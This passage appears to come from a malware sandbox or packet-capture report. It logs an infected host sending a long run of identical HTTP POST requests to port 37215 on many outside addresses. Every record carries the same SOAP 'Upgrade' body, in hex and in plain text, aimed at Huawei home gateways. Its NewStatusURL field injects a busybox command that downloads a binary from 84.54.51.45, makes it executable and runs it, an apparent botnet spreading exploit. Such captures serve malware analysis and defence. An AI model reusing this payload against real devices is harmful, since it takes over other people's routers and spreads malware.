                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1111192.168.2.154601241.113.152.4737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173657894 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1112192.168.2.155073641.43.151.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173662901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1113192.168.2.154027441.64.30.17437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173724890 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1114192.168.2.154001841.185.213.15037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173728943 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1115192.168.2.154683641.124.10.14137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173748970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1116192.168.2.155579641.201.144.3237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173778057 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1117192.168.2.155916241.78.207.18137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173806906 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1118192.168.2.155537641.130.27.16937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173832893 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1119192.168.2.155031641.11.132.1237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173870087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1120192.168.2.154569041.61.66.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:11.173899889 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
